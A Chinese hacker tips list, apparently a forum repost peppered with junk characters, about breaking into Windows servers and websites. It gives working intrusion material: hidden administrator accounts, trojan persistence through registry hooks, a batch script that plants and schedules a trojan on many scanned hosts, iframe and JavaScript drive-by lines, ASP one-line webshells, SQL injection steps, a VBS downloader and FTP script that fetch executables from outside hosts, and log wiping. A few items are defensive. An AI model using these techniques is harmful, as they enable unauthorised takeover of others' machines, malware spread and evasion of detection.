Xp系统修改权限防止病毒或木马等破坏系统,cmd下,2 I( K4 y$ }( O V9 i: ]
cacls C:\windows\system32 /G hqw20:R1 x Y& u8 ^5 }
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, _5 a: y- S! @0 ]9 F恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
0 d2 g; G# g5 |
# C0 R2 x! L S/ I2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- [' ^8 C8 a8 b2 b& p1 y% ^% i) q7 r. s k# f
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
' `- g* `* [( N8 \( U
m+ e9 k, I1 U P0 C4 E4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
& t1 P4 } K, y+ @1 i" h( a* U# C8 L* g8 P; V- H
5、利用INF文件来修改注册表
e, b2 l1 ^6 m0 _' D[Version]+ |* o7 k% S8 _1 g3 v
Signature="$CHICAGO$"8 q1 v' z0 I5 v# n% o# t- d6 w$ l
[Defaultinstall]' t5 l: D( H+ l+ o# ]+ C
addREG=Ating
- v; f; t( y# ][Ating]( Q- p! |* X5 C2 B' f0 p$ P
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"" D* h6 O5 Y; ?: e
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:7 B& f+ I# j4 b- h" v# A
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径5 u7 a. q2 q1 X& H& H
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU( T% o9 Y4 c5 w2 N
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
E$ D i7 J' ?& z- f' FHKEY_CURRENT_CONFIG 简写为 HKCC$ o+ m" J, B9 H! w/ b
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值0 g7 z- H( `; U/ W' z
"1"这里代表是写入或删除注册表键值中的具体数据
2 I0 n! _4 x5 }: ]2 J/ }$ l( G7 A
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 d9 o- S1 E. j8 A! {: R多了一步就是在防火墙里添加个端口,然后导出其键值
! r9 p" p2 M- n! o4 b) f0 Y[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
0 s! H" e# b e4 L9 E# u
" v" b! U! w+ f7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 z4 U* |& D. K* b- M
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( y, l$ M; M7 Q6 z8 D( M. ] g! G
: a8 C6 i$ ?& T8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
6 b; G6 ]- Q) B1 [4 H: C5 k, t8 S; i: S* \
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,2 m4 F, H5 B3 z3 H# t% f
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& T; ?2 V# }6 i& ~
; A. ]/ o1 Z4 `; t6 ^10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”" }1 y3 G0 E3 s1 i/ }! j
/ t# Y r1 n+ U0 h11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
2 T/ q( |8 G9 ]0 P9 N# g1 f$ Z用法:xsniff –pass –hide –log pass.txt
+ q; X: c6 [* r+ G* ]
& \6 V( W0 a6 }5 t8 i- ^12、google搜索的艺术
7 Y9 F1 a9 I0 j. ^7 C7 ]搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”* y; I7 [, L F9 }. X8 O7 R
或“字符串的语法错误”可以找到很多sql注入漏洞。9 K9 t" t; y$ G; ?6 b0 {
2 x) c | g) I! {& L" K
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
' B( z: y( v( _) t: V; Z3 d: {! A# i
14、cmd中输入 nc –vv –l –p 1987. H, s) T S/ }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
1 u0 u& {' S. x) F/ r0 p% C$ y
9 l- P( X: r' Y6 S15、制作T++木马,先写个ating.hta文件,内容为
m3 _! k; i6 g I7 Z" v' P<script language="VBScript">
0 J$ k. P. a9 J8 m( z! B% Qset wshshell=createobject ("wscript.shell" )
: H8 E- r: Z# m9 Q7 p: K+ E, ra=wshshell.run("你马的名称",1)
; F( Q5 L% ?0 s% Vwindow.close; M/ V( w, L, W p) M* d5 N
</script>: B) ~8 W+ L( h6 ?/ l- E8 o+ X' s: n4 u7 y
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
6 I" z, N9 ?7 K: |7 M( l$ ~6 |8 t8 K) V
16、搜索栏里输入
, D% A+ t0 F) f+ m1 \关键字%'and 1=1 and '%'='
; T$ c7 B+ D0 K1 e关键字%'and 1=2 and '%'='
3 y+ y+ X, a9 m$ r比较不同处 可以作为注入的特征字符
5 b* A- H( w* h- [( G$ m- l. I- J$ o6 Z4 y: _7 V. f4 J2 }
17、挂马代码<html>
4 v0 V7 u6 m, E, J; ]<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>2 Z9 ^8 `7 P9 T, u: c: J+ W5 W
</html>
, Z" Z- g" j- k e3 C) Z; ], [6 _- y- c0 h, v: s
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆," a* A7 e s* y# Y# ], U
net localgroup administrators还是可以看出Guest是管理员来。5 m a2 ]+ K- S' F) D
' Y0 V$ `$ i% d6 |( R4 ~
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等2 [3 G: x/ s* `( R
用法: 安装: instsrv.exe 服务名称 路径
# M5 b! L) j! j, e& f卸载: instsrv.exe 服务名称 REMOVE
- Z. T1 |& k" z/ Z/ J6 U3 N0 ]; I5 z: h1 N2 M/ w3 I6 r
; Z7 k/ l3 j5 s( L1 N& H, a) [21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" U5 b) S$ N8 Y j# }
不能注入时要第一时间想到%5c暴库。9 n$ P2 n5 R! i; U6 f5 {; F% V
& p' M7 _. e9 u# P. t$ m22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ }8 }$ f1 R' i8 R, c$ K! x
4 e5 J7 \! O) I/ J! i1 s7 m23、缺少xp_cmdshell时
D8 V2 g4 s! s尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'7 Q3 N; s5 O, ?6 l
假如恢复不成功,可以尝试直接加用户(针对开3389的)2 r, |; F6 r5 K+ Q) i6 E
declare @o int4 T5 e; v# A5 {1 B* d1 E
exec sp_oacreate 'wscript.shell',@o out2 R& H" q F0 Y K2 t" ~3 P/ ]! C
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
& k/ h; w* n( r1 N% \) \1 L" ]8 }$ j
24.批量种植木马.bat* V# L3 S3 u/ E# @1 M* ~% e( q( `
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- }* w1 a# k1 A3 ]. v" `) l
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# n- n- A8 \( q; z1 {
扫描地址.txt里每个主机名一行 用\\开头* a* S# S7 @7 {$ ~8 j; f% a& V/ p
5 o0 z$ G3 |- u2 s+ s% d25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
" f5 i! @/ E- {! F- ^* ^& G2 J2 p4 e
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名. g3 E( B9 t- S
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.2 z3 u1 J* r9 q9 W1 C. h7 n" \8 [
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
- A4 D& ^8 L8 o% F
, D1 g( S3 l3 v+ W27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 n. A G) {6 c% \& e0 e9 o3 K然后用#clear logg和#clear line vty *删除日志
: f1 e" y# R1 ?! N" k
5 O8 z$ X. E6 G1 t' h6 W3 g28、电脑坏了省去重新安装系统的方法$ Q4 |8 K. F1 F( m
纯dos下执行,
3 s. \. i1 u7 ]$ s' g/ Zxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* C. \. L$ l: w' }' T3 v+ z+ {
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config5 Z' ]! D x- c" g$ }
# n4 B! r* }5 V/ J3 ?) W29、解决TCP/IP筛选 在注册表里有三处,分别是:! [; s6 q7 i1 v* J2 N- f" i
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
+ C% ?* ]" V5 v' O; YHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& W8 n4 S8 U7 T+ s; b
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& `8 _1 H( b! _/ h分别用" f/ p" w8 Y! I7 K
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 T; @& ]% q. P! M: N9 m. K1 E
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 c% X9 H$ K' l. i# hregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 k' h# ~- V0 `3 _$ L, y) o
命令来导出注册表项
$ A4 n* N* Z0 U然后把三个文件里的EnableSecurityFilters"=dword:00000001,
1 w+ z3 Z5 \5 ^: o8 n改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用3 q p3 |" |! v; R7 G1 Z$ v
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
) c7 S4 C9 }, ^. t; r/ `" a' r8 g
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 j4 x+ }( G# d' [2 PSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
! u2 q$ |9 @( t- a# A1 U/ C; m
/ Q4 \/ G! y8 m& a31、全手工打造开3389工具
. y8 a# A1 b X s+ I打开记事本,编辑内容如下:
0 I) c& {- V: j# A$ |: Becho [Components] > c:\sql
0 G: f" z2 V3 b: e3 }+ qecho TSEnable = on >> c:\sql& b( ]+ ] N. q1 S* _
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
" y% g. C7 K* D- w1 N2 {编辑好后存为BAT文件,上传至肉鸡,执行" y0 Z! V& e/ f0 W+ a
- L/ d" \8 \/ q" x3 c4 Q" p
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马% j; j5 q7 ~/ Y$ K' j
. ^9 h) d& d2 @) ?
33、让服务器重启7 Y9 M5 C* Y0 J4 Z) ]
写个bat死循环:# m6 ~% `0 ?. Y) L# J( D$ _5 K
@echo off
5 t6 ?+ @$ L8 ]) q3 a:loop1
7 z1 C, H6 i+ {1 Ecls t% {+ ~% S! ~; O" a% O
start cmd.exe
}8 O1 H5 T. Mgoto loop17 I* N% C: G( P2 ^ R. s A$ H/ @
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启) |+ r' q1 w5 {* G
! A' u3 X, E* A* A
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,8 L' O' G0 _0 H, S
@echo off
" z* Q0 p8 ]( y$ U' O" b7 f/ m) T( udate /t >c:/3389.txt
0 J* G. G/ }: \$ `7 T. E) @time /t >>c:/3389.txt- R& s% J2 B6 T% I0 ^1 s1 W% k
attrib +s +h c:/3389.bat, f4 |) I$ x, y5 g: |
attrib +s +h c:/3389.txt
* p# e4 y$ G0 @) U" f5 }- g$ pnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 M. {9 ?1 o1 Z& @ Y
并保存为3389.bat
2 k& g% T5 A7 c9 B6 i8 }2 s- }% g, n打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号 M& X+ R" R! b, _% C$ R* ]
7 Q9 `, Q1 A* g( M7 a4 s
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
! x( d! o% O& K- mstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
* Z- d8 w7 p& y& n- s输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。 q+ ]+ R" o7 a$ o( Y/ T
" N2 v) @( W* C: ?5 O3 r$ r, J36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; \0 ]2 h4 R& j& X: ~, w4 g Gecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
) g' V: p; F A# e9 Q: zecho 你的FTP账号 >>c:\1.bat //输入账号6 s% k1 g9 n# V9 ]
echo 你的FTP密码 >>c:\1.bat //输入密码
5 ~- x. N/ D+ i/ m# V: Recho bin >>c:\1.bat //登入. U1 t. Z. D, j+ D2 Z' P9 j
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
- E1 {/ ]8 L J9 \! g1 yecho bye >>c:\1.bat //退出
9 y$ K$ ]8 D: [3 l: ^: p然后执行ftp -s:c:\1.bat即可
, i. \# t! V8 h: C; |$ e
6 J8 m3 a: l1 S/ w; R' `+ ~37、修改注册表开3389两法$ m/ a5 V q0 ]* x" ^) |: C9 j
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表6 z- x' b2 E$ ?. g0 c# a
echo Windows Registry Editor Version 5.00 >>3389.reg
& O! Q- s9 s v0 I$ X1 U$ Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 `6 N) p1 }: @: h+ ^
echo "Enabled"="0" >>3389.reg
' k6 L8 ~/ i" }3 S- lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
4 `, D1 G% y9 kNT\CurrentVersion\Winlogon] >>3389.reg
& p& w' t& A6 h) zecho "ShutdownWithoutLogon"="0" >>3389.reg
1 B$ B: f+ n! e" a) o7 u9 Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& j/ y' q9 g0 ]$ ]6 v0 D, @8 N
>>3389.reg
+ F# Y* J6 ^$ r, gecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
, G- O; ?3 K, q+ cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
( j5 n5 d' d; Y- ]' d: N8 |) ?>>3389.reg
2 o8 {+ ^$ [4 P1 O/ H: Z- Lecho "TSEnabled"=dword:00000001 >>3389.reg& U; u" V2 ^4 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
& @' l% [- H" }echo "Start"=dword:00000002 >>3389.reg
, |. X7 U A W( D1 lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% B0 _7 c# a/ |( p
>>3389.reg
& F: r$ z1 Q8 x& {: x1 l Y& necho "Start"=dword:00000002 >>3389.reg
0 d* x& K' ]7 E, M @1 a3 ]8 m7 fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg! n e8 N" G4 I$ |3 U
echo "Hotkey"="1" >>3389.reg
4 _8 b/ i; T% Z3 q: N+ Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; O, c0 O: B# U" S1 SServer\Wds\rdpwd\Tds\tcp] >>3389.reg3 _, }. ~' D: a; @, W5 y2 A; O
echo "PortNumber"=dword:00000D3D >>3389.reg
, |3 a: B9 ^; [ H% M, Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' }. d' W2 v' U! f8 ~# N
Server\WinStations\RDP-Tcp] >>3389.reg, [6 y5 T0 i5 X+ m7 ~1 S$ Z- b2 l
echo "PortNumber"=dword:00000D3D >>3389.reg
9 O0 ?9 {0 i; ~* D* z, X把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
# n3 y3 N. O1 N! m+ j% E(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)) _$ H! {3 `& w' X' l
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效1 u/ @. _; C4 I! F# d
(2)winxp和win2003终端开启
; n2 U" U6 |. E' |; B6 [. Z$ x+ F0 [用以下ECHO代码写一个REG文件:" l* V8 Y2 j7 R2 O
echo Windows Registry Editor Version 5.00>>3389.reg7 P1 x( V0 Z9 ?6 J9 a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Q5 @, z3 Q! u7 @" r; c" Z! ]6 f1 hServer]>>3389.reg& H, N2 j* F% v% |
echo "fDenyTSConnections"=dword:00000000>>3389.reg
, D: V y$ e: i" e$ secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 S) t" _/ g( t
Server\Wds\rdpwd\Tds\tcp]>>3389.reg* S; @2 X$ Q) W2 Z! [- X
echo "PortNumber"=dword:00000d3d>>3389.reg4 L X% K/ T. d# y" u/ h' N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! x1 O$ X" R, f) r7 ^' [
Server\WinStations\RDP-Tcp]>>3389.reg
' p( u2 b7 U K( p8 ?2 c" yecho "PortNumber"=dword:00000d3d>>3389.reg
% A; j! ]. e. Q, [1 E- R然后regedit /s 3389.reg del 3389.reg/ s! p" H0 @4 U D
XP下不论开终端还是改终端端口都不需重启
1 E( o: n& l; i; c) _; z
7 ] |( a* n% B6 y! F, z38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
+ x( G7 f5 R7 K7 o) V$ O2 y6 ~' `) D用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' J6 t2 r8 A1 i. B+ ^
$ ]- K% k" h% ]$ D% ]) r! `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 r/ P$ J( G) q+ l(1)数据库文件名应复杂并要有特殊字符7 R* R/ @9 Z: U
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
. B" Y! ^: h7 e; Q. ?* V' c将conn.asp文档中的
: S" m+ u. u6 w$ F. `# sDBPath = Server.MapPath("数据库.mdb"). M3 x: k, S" H* n
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath( _( n8 M0 {7 o6 L# t9 n" v C
" x, T, e+ ~. V( i& D" @5 U- G; C* n修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
. ^5 c1 Y( I2 D7 R: j5 q5 F(3)不放在WEB目录里0 Z7 _9 x3 ?9 w8 e6 D
+ g0 H0 V! o7 d% u1 `2 d40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉; b \' }3 y8 A$ u/ I- ^
可以写两个bat文件- a& b2 ^) R4 j: d: T6 X- K% k! N6 G# R
@echo off' g6 ]5 w; G; l9 [) n) }" O
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ L% s. u, Y& {6 R: o& n+ ]
@del c:\winnt\system32\query.exe
' r/ N0 d" h, E: }@del %SYSTEMROOT%\system32\dllcache\query.exe
7 c) t1 B/ E+ `7 \/ m@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
8 A+ c( _+ C. {: N$ D% g4 C3 O5 M9 B
@echo off
- j2 R& J+ a: R8 M1 C7 S# u@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe# L e! S4 z% L5 x2 V% b9 d
@del c:\winnt\system32\tsadmin.exe
C' O& Y; J, l, f@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
7 `8 z/ R4 H: {
5 L' o$ F7 z- v3 L8 c41、映射对方盘符) _( s V$ V: U2 l
telnet到他的机器上,
% ^% x8 ^2 ~# b& L, p" j6 Anet share 查看有没有默认共享 如果没有,那么就接着运行* J6 c# R/ h& v0 s1 _ \+ z
net share c$=c:! ]- u2 H5 g4 ]( J
net share现在有c$% P0 F }% [' P
在自己的机器上运行
- I9 Q6 S9 h' n! n+ Z! B) {* ?net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
, {3 Q+ S4 i5 J. [
" V7 w( z" j/ W+ W$ o$ M7 `42、一些很有用的老知识
( K1 B0 d2 I+ etype c:\boot.ini ( 查看系统版本 )
+ r8 C# d+ g! ?net start (查看已经启动的服务). o; G' l0 ]4 U/ m( R
query user ( 查看当前终端连接 )
/ ^. B* z9 O& t8 qnet user ( 查看当前用户 )
, A% `$ I1 F6 A0 j9 ]6 y! ~0 o* _' cnet user 用户 密码/add ( 建立账号 ). `. c, ]6 M' r
net localgroup administrators 用户 /add (提升某用户为管理员)
7 \, P" Y2 k0 d) G+ mipconfig -all ( 查看IP什么的 )( o p; }' B3 c/ g
netstat -an ( 查看当前网络状态 )
+ @0 w* l6 T f5 G" \" k! c7 m/ jfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
; h$ z- l6 | u4 J- i+ F+ c克隆时Administrator对应1F4& k+ i. g, y2 U* P
guest对应1F5/ \% W% e6 X& {7 K
tsinternetuser对应3E8
+ u5 o6 G0 }! F: r$ y
4 n4 I1 \9 E' r3 Y4 n* d43、如果对方没开3389,但是装了Remote Administrator Service
% f& e" p6 K/ f8 |: R' k% t3 \用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 i5 r' q# n; Z8 h解释:用serv-u漏洞导入自己配制好的radmin的注册表信息3 t' E# O( `, x2 O, m7 t2 M
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' j! E% s6 T4 B. A; h
, C# C& P9 t4 q6 y
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; j8 L9 q3 P' C% _本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
: G# V* ^- ]3 y# x! T+ {% \! }
* j0 A& B1 y; v7 E D45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 x& X4 r5 ^4 J/ U: G. O) b( b
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
0 V0 C; |# j/ R& O5 T8 d; i& q4 v1 b^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
. z9 ?* j+ P/ O7 F8 o5 s+ uCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- }# P% Y( w' S* O& c# E1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. d! G; c- d2 K4 Q(这是完整的一句话,其中没有换行符)
# H1 D8 T8 n3 A% o然后下载:8 `0 M, o5 r% c1 O4 R: p* R( y
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 {8 W: v; X2 w( u% u( O& p$ D0 a/ r. ~
46、一句话木马成功依赖于两个条件:; `4 Z3 K& u+ g+ [/ L
1、服务端没有禁止adodb.Stream或FSO组件
. R. T7 {2 F! n; J& m% d/ T2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
' s/ ~; w2 V( T9 u! J( k
+ h1 [! n& @" Z47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 k' O K6 J' H- g;alter database utsz set RECOVERY FULL--
# c( h5 ?8 \/ k q* c8 };create table cmd (a image)--5 X, d2 ^ u) T: y
;backup log utsz to disk = 'D:\cmd' with init--
6 r3 i, S" y. h;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--$ ^1 `; e* X; ~4 F% K
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--; N. I0 P7 i$ n. O" E1 s5 ]
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
+ s+ i. }+ ~1 Z! E; [. s) t6 {
% I8 z$ g8 W, g48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# L% X- s3 _8 v( p) V5 ?& a$ h
& C2 p+ _ d' }0 W用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
. F6 x! |- U. K. y4 [- F5 ?0 n0 A所有会话用 'all'。# b$ E) l! ?) _6 }- H. n
-s sessionid 列出会话的信息。! N* c8 p, r# w9 v
-k sessionid 终止会话。" {% y4 Y/ q: c( o
-m sessionid 发送消息到会话。
1 B u* L( X& }9 l. Y# ]' p
% X- b: U7 `3 Z4 V# ~config 配置 telnet 服务器参数。8 d y- `9 D2 ~9 H+ q$ A
9 g9 m% }! c% ^1 J' v: B
common_options 为:. \ B* \" f8 H4 [% k1 q
-u user 指定要使用其凭据的用户: ~4 T7 |; [0 C$ x% [' k
-p password 用户密码& A5 S: M; A0 d" j$ a- j0 i
4 ?# _6 ?, M3 w _; }: Lconfig_options 为:% K6 B0 C: F6 Y
dom = domain 设定用户的默认域
, D- F3 B7 J( J' R, H$ I& V8 Uctrlakeymap = yes|no 设定 ALT 键的映射
, v3 ?$ B) I4 X4 ^8 L1 D/ S1 Z ztimeout = hh:mm:ss 设定空闲会话超时值
9 x5 M# I/ B) S/ \) l% Htimeoutactive = yes|no 启用空闲会话。
( y9 y2 G9 M- y1 `# F nmaxfail = attempts 设定断开前失败的登录企图数。' U) T& t7 `9 D; X8 M! t2 I
maxconn = connections 设定最大连接数。
, E) T- x) }' V M Qport = number 设定 telnet 端口。
4 I9 {$ e# n) |sec = [+/-]NTLM [+/-]passwd
1 q4 N& [# q: H$ h/ i设定身份验证机构
' p& ?9 Z/ u! \) ], F6 \fname = file 指定审计文件名。8 [8 w# E4 r! u0 F7 l
fsize = size 指定审计文件的最大尺寸(MB)。
" K- B- M- p9 x# ?+ w+ Nmode = console|stream 指定操作模式。
, q2 B& ~" L! Q/ _* w! \ Oauditlocation = eventlog|file|both6 N0 W6 [* Z2 Z
指定记录地点
/ E T- C& ^0 |audit = [+/-]user [+/-]fail [+/-]admin
" ]. H2 |' q8 ~7 L3 W1 T# C
' o! a; }, a# S49、例如:在IE上访问:
3 `1 R& G) ~3 I: N/ uwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/- P, J) V6 P9 h a
hack.txt里面的代码是:
* d, W9 P6 r( S- g$ j<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ J# {& c, y# e% r& B5 ?把这个hack.txt发到你空间就可以了!
1 B9 F5 Z& H( N: Y这个可以利用来做网马哦!+ R e' ^7 t; I
3 C. i) ]" U' `( n! z/ s3 Z. Y
50、autorun的病毒可以通过手动限制!& ~: D. S' \/ p9 Y/ Y2 `
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* ?1 j0 e T# E! X5 {/ n7 w9 U
2,打开盘符用右键打开!切忌双击盘符~
1 L* M6 @5 I3 a/ V, i& j& f a3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 `4 q( K* N2 e$ F+ y; Y; `4 t" ^" _: [5 ~, U' E
51、log备份时的一句话木马:
* o: j( J& x9 T+ g4 ^a).<%%25Execute(request("go"))%%25># m" S7 t9 z7 p. Q% U
b).<%Execute(request("go"))%>/ N+ `, N3 A; B: i& I( R
c).%><%execute request("go")%><%
6 }1 K: T/ n4 T- [7 ^8 Qd).<script language=VBScript runat=server>execute request("sb")</Script>* D9 b( j" C0 n' Z
e).<%25Execute(request("l"))%25>
4 |, w# s$ G0 zf).<%if request("cmd")<>"" then execute request("pass")%>
& F/ f- u1 S$ V. ?: K/ ]' F* v+ I3 ?& y. p5 h2 Y x! o
52、at "12:17" /interactive cmd
" j5 E* ]/ _ G% @. \' g1 e执行后可以用AT命令查看新加的任务7 l, f; x: w7 y. M L3 q" a
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。4 l: x, \; K' }% d
" \. D" x5 V0 O* S' ^+ F
53、隐藏ASP后门的两种方法
